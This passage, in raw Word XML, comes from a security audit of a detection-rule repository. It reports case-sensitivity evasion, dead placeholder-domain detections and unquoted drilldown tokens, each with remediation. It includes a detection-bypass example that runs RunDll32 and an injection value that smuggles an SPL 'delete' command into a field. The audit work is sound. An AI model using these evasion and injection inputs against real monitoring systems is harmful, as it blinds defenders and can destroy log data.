          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>like()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>case-sensitive</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Detections that apply a case-sensitive </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>match</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>LIKE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as the final discriminating filter are bypassed by changing case. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rundll32</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> loaded as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>RUNDLL32.EXE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Windows is case-insensitive for execution) evades </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>match(process,"rundll32...")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>crushftp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploit detection keys on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>match(process,"mesch\.exe")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> etc. case-sensitively. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Source = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>process</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/command line the attacker chooses. Sink = the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that gates the alert. Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (attacker fully controls casing of their own process/command).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept (bypass payload)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Execute </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>RunDll32.exe foo.dll,#1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> instead of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rundll32.exe foo.dll,#1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>match(process,"rundll32.+\#\d+")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> does not match → no detection, while behaviour is identical.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Force case before matching, or add </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>(?i)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to every regex:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>| where match(lower(process),"rundll32.+#\d+")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>match(process,"(?i)rundll32.+\#\d+")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. For the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>LIKE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cases use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>like(lower(root_drive),"c:")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>where match(lower(root_drive),"^[a-z]:$")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (and don't hard-code </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>C:</w:t>
      </w:r>
      <w:r>
        <w:t>). This preserves true positives while removing the casing bypass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-178 Improper Handling of Case Sensitivity; CWE-184 Incomplete List of Disallowed Inputs; CWE-693 Protection Mechanism Failure. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A04:2021 Insecure Design. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1036 Masquerading, T1027 Obfuscated Files or Information, T1562.001 Impair Defenses: Disable or Modify Tools. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-4 System Monitoring. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DE.CM Detect - Continuous Monitoring. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.16 Monitoring activities. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Detection content / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DET-07 — Hard-coded placeholder domain internal_test_email.com ships as live detection logic (dead detections)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 5.3). Exploitability: Not exploitable directly (silent coverage gap).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> detections/cloud/gsuite_outbound_email_with_attachment_to_external_domain.yml:16; gsuite_email_suspicious_subject_with_attachment.yml:16; gsuite_email_with_known_abuse_web_service_link.yml:16; gsuite_drive_share_in_external_email.yml:17; gsuite_suspicious_shared_file_name.yml:16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Five GSuite detections gate on a literal placeholder domain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>internal_test_email.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that must equal the customer's own domain. As shipped (two are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>status: production</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> clause can never match any real tenant's traffic, so the detection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>silently never fires</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — a false sense of coverage. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>how_to_implement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mentions editing for two of them, but production detections ship enabled with logic that is inert until hand-edited, and there is no macro/lookup indirection to make the edit safe/visible. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Not attacker-triggered; it is a coverage gap (the detection is dead). Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Not exploitable directly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — it is a silent-failure / missing-detection issue (A09). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: Externalize the org domain into a macro or lookup so it is configured once and the dead-literal is impossible:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>`gsuite_gmail` ... | rex field=source "[^@]+@(?&lt;source_domain&gt;[^@]+)"</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 where [| inputlookup cim_corporate_email_domain_lookup | rename domain as source_domain | format]</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AND NOT [| inputlookup cim_corporate_email_domain_lookup | rename domain as dest_domain | format]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">or reference a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>corporate_email_domains</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> macro. Until then these should be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>status: experimental</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and disabled by default, not </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>production</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1188 Initialization of a Resource with an Insecure Default; CWE-665; CWE-693 Protection Mechanism Failure. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A05:2021 Security Misconfiguration, A09:2021 Security Logging and Monitoring Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1562.001 Impair Defenses: Disable or Modify Tools. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CM-6 Configuration Settings, SI-4 System Monitoring. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DE.CM Detect - Continuous Monitoring. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.16 Monitoring activities, A.8.9 Configuration management. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Detection content / System Configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DET-05 — ES drilldown and risk-message $field$ tokens are substituted unquoted (1,971 detections; one uses |s)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 4.3). Exploitability: Conditionally exploitable (defence-in-depth).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> detections/**/*.yml drilldown_searches (3,980 searches), e.g. detections/endpoint/access_lsass_memory_for_dump_creation.yml:34; only detections/endpoint/windows_powershell_process_with_malicious_string.yml:47 uses $dest|s$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: ES renders drilldown </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> strings and notable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rule_title</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>risk_message</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by substituting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$field$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with the triggering event's field value. contentctl's own schema (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>EsTokenString</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) documents token substitution "resolved at alert-firing time to the value of the named field". For drilldown </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fields, the substituted value is interpreted as SPL when the analyst pivots; a field value containing SPL metacharacters (e.g. a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>process</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>file_name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> field containing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>" | ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) can alter the drilldown search. The repo overwhelmingly emits bare </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$field$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search dest = "$dest$"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), not </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$field|s$</w:t>
      </w:r>
      <w:r>
        <w:t>. For the 1,829 drilldowns whose tokens are attacker-influenceable fields (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>process</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>file_name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>process_name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, …) this is a latent SPL-injection-into-drilldown / defense-evasion vector; for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>finding.title</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rba.message</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the tokens render as notable text (stored-text, not HTML — ES renders risk_message as text, so true stored-XSS is not demonstrable here, hence not rated as XSS). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Source = event field in the triggering event. Sink = SPL compiled when an analyst clicks the drilldown (UI:R, PR:L analyst). Most tokens are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dest</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (host/user names) with limited injection surface; the risk is real only where the token is a free-form attacker-controlled string and the drilldown places it unquoted. Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conditionally exploitable / defense-in-depth</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — depends on ES rendering and analyst interaction; low confidence of practical injection but a systemic hardening gap. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: A detection emitting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| search process = "$process$"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in a drilldown, firing on an event whose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>process</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>x" | delete | search "</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> would, upon analyst pivot, render </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| search process = "x" | delete | search ""</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The one-line fix below neutralizes it. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Quote every substituted token with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>|s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in drilldown search fields: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| search process=$process|s$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. For </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>%original_detection_search% | search dest = "$dest$"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| search dest=$dest|s$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This should be enforced in contentctl's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Drilldown</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>EsTokenString</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> validation (reject bare </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$field$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> inside a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search</w:t>
